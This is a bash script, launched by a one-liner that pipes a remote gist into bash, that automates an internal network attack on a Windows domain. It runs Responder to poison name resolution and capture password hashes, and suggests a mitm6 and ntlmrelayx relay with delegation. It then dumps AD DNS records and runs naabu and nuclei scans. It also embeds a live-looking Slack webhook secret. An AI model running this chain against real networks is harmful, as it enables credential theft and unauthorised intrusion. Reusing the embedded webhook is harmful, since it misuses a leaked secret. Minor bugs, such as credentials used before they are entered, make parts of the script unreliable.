bash -c "$(curl -fsSL https://gist.githubusercontent.com/nullenc0de/a14866ef55454abc6138d1d8afb08866/raw/ee5a5ef90440be0c7c0234199eabc51f16ebffc3/auto.sh)"

auto.sh

#!/bin/bash

# Function to add items to the todo list
add_to_todo() {
  local item="$1"
  echo "$item" >> "${folder_name}/todo.txt"
}

# Function to send alerts via webhook
send_alert() {
  local message="$1"
  local webhook_url="https://hooks.slack.com/services/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"
  local payload="{\"text\":\"[${domain_name}] ${message}\"}"

  curl -s -X POST -H 'Content-type: application/json' --data "$payload" "$webhook_url"
}

# Check if required applications exist and offer to install them if missing
if [ ! -f "/usr/bin/mapcidr" ] || [ ! -f "/usr/bin/naabu" ] || [ ! -f "/usr/bin/nuclei" ] || [ ! -f "/usr/local/bin/adidnsdump" ]; then
  read -p "One or more required applications are missing. Would you like to install these tools? (y/n): " install_tools
  if [[ "$install_tools" == "y" ]]; then
    # Install Python package
    echo "Installing Python package..."
    python3 -m pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump >/dev/null

    # Define download URLs and tool names
    MAPCIDR_URL="https://github.com/projectdiscovery/mapcidr/releases/download/v1.1.16/mapcidr_1.1.16_linux_amd64.zip"
    NAABU_URL="https://github.com/projectdiscovery/naabu/releases/download/v2.3.1/naabu_2.3.1_linux_amd64.zip"
    NUCLEI_URL="https://github.com/projectdiscovery/nuclei/releases/download/v3.2.8/nuclei_3.2.8_linux_amd64.zip"

    # Download tools to /tmp directory
    echo "Downloading required tools to /tmp..."
    wget -q "$MAPCIDR_URL" -O /tmp/mapcidr.zip
    wget -q "$NAABU_URL" -O /tmp/naabu.zip
    wget -q "$NUCLEI_URL" -O /tmp/nuclei.zip

    # Extract and move tools to /usr/bin
    echo "Extracting and installing tools to /usr/bin..."
    sudo unzip -qq /tmp/mapcidr.zip -d /usr/bin/
    sudo unzip -qq /tmp/naabu.zip -d /usr/bin/
    sudo unzip -qq /tmp/nuclei.zip -d /usr/bin/

    # Set executable permissions
    sudo chmod +x /usr/bin/mapcidr /usr/bin/naabu /usr/bin/nuclei

    # Clean up downloaded files
    rm /tmp/mapcidr.zip /tmp/naabu.zip /tmp/nuclei.zip
    echo "Download, extraction, and installation complete."
  else
    echo "Installation of required tools skipped. Please ensure the tools are installed manually."
    exit 1
  fi
fi

# Function to prompt user with a default value
prompt_with_default() {
  local prompt_message="$1"
  local default_value="$2"
  local user_input

  read -p "${prompt_message} [${default_value}]: " user_input
  echo "${user_input:-$default_value}"
}

# Auto-populate variables
default_domain_name=$(cat /etc/resolv.conf | grep search | cut -d ' ' -f2)
default_folder_name="${default_domain_name}"
default_dc_ip=$(cat /etc/resolv.conf | grep nameserver | cut -d ' ' -f2 | head -n 1)

# Prompt user for input with defaults
echo
folder_name=$(prompt_with_default "Enter folder name" "${default_folder_name}")
domain_name=$(prompt_with_default "Enter domain name" "${default_domain_name}")
dc_ip=$(prompt_with_default "Enter DC IP address" "${default_dc_ip}")

# Display entered variables
echo
echo "You have entered the following values:"
echo "-------------------------------------"
echo "Folder name: ${folder_name}"
echo "Domain name: ${domain_name}"
echo "DC IP address: ${dc_ip}"
echo "-------------------------------------"
echo

# Prompt user to validate the entered variables
read -p "Are these values correct? (y/n): " confirm
if [[ "$confirm" != "y" ]]; then
  echo "Please run the script again and enter the correct values."
  exit 1
fi

# Create the folder if it does not exist
mkdir -p "${folder_name}"
cd "${folder_name}" || exit

# Prompt user if they have credentials
read -p "Do you have credentials? (y/n): " has_creds

# Check if credentials are provided early
if [[ "$has_creds" == "y" ]]; then
  add_to_todo "./linWinPwn.sh -t ${dc_ip} -d ${domain_name} -u ${username} -p ${password} -o ${folder_name} --auto"
fi

if [[ "$has_creds" != "y" ]]; then
  echo "Starting the search for initial access..."

  attempt_count=0
  while true; do
    attempt_count=$((attempt_count+1))
    echo "Running Responder for 10 minutes... (Attempt $attempt_count)"
    timeout 600 responder -I eth0 -wFdDPv
    echo "Responder run complete."

    # Search for new txt files in the responder logs folder
    echo "Searching for new txt files in the responder logs folder..."
    new_files=$(find /usr/share/responder/logs -type f -name "*.txt" -mtime -1 2>/dev/null)

    if [[ -n "$new_files" ]]; then
      echo "Found new files:"
      echo "$new_files"

      # Send alert before prompting to view files
      send_alert "User input required: View Responder hashes."

      read -p "Do you want to see the contents of these files? (y/n): " view_files
      if [[ "$view_files" == "y" ]]; then
        sort -u -t: -k1,1 "$new_files"

        # Create the responder_output folder within the specified folder
        mkdir -p "${folder_name}/responder_output"

        # Copy the new files to the responder_output folder
        cp $new_files "${folder_name}/responder_output/"
        echo "New files copied to ${folder_name}/responder_output."
      fi
      break
    elif [[ $attempt_count -eq 3 ]]; then
      echo "Failed after 30 minutes. Maybe try mitm6."
      echo "Tell the user to run the following commands in the other window:"
      echo
      echo "mitm6 -d ${domain_name}"
      echo "impacket-ntlmrelayx -t ldap://${dc_ip} -6 -smb2support -wh wpadtest --delegate-access"
      echo
      echo "Move onto the next phase."
      add_to_todo "mitm6 -d ${domain_name}"
      add_to_todo "impacket-ntlmrelayx -t ldap://${dc_ip} -6 -smb2support -wh wpadtest --delegate-access"
      break
    else
      echo "No new files found. Retrying..."
    fi
  done
fi

# Send alert before prompting for credentials
send_alert "User input required: Responder Done, Enter credentials."

# Prompt user for credentials
echo
read -p "Enter username: " username
read -sp "Enter password: " password
echo

# Display entered credentials
echo
echo "You have entered the following credentials:"
echo "-------------------------------------"
echo "Username: ${username}"
echo "Password: ${password}"
echo "-------------------------------------"
echo

# Prompt user to validate the entered credentials
read -p "Are these credentials correct? (y/n): " confirm_creds
if [[ "$confirm_creds" != "y" ]]; then
  echo "Please run the script again and enter the correct credentials."
  exit 1
fi

# Open the URL in the background and disassociate the process
nohup xdg-open https://localhost:8834 >/dev/null 2>&1 &

# Prompt user to run pingcastle.exe command
echo
echo "Please run the following command in a separate window:"
echo "pingcastle.exe --healthcheck --server ${dc_ip} --user ${username}@${domain_name} --password ${password}"
add_to_todo "pingcastle.exe --healthcheck --server ${dc_ip} --user ${username}@${domain_name} --password ${password}"
echo

# Run adidnsdump
echo "Running adidnsdump..."
adidnsdump -u "${domain_name}\\${username}" -p "${password}" --dns-tcp "${dc_ip}"
echo "adidnsdump complete."

# Process records and run mapcidr
echo "Processing records and running mapcidr..."
cat records.csv | grep -Po '(?<![\d.])((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.|$)){4}(?![\d.])' | mapcidr -aa -o "${folder_name}/subnets.txt"
echo "Processing complete."

# Open the subnets.txt file in a text editor and disassociate the process
nohup xdg-open "${folder_name}/subnets.txt" >/dev/null 2>&1 &

# Run naabu and nuclei
echo "Running naabu and nuclei..."
cat "${folder_name}/subnets.txt" | naabu | nuclei -severity critical,high,medium -o "${folder_name}/nuclei.txt"
echo "naabu and nuclei complete."

# Display the todo list
echo
echo "Todo list:"
cat "${folder_name}/todo.txt"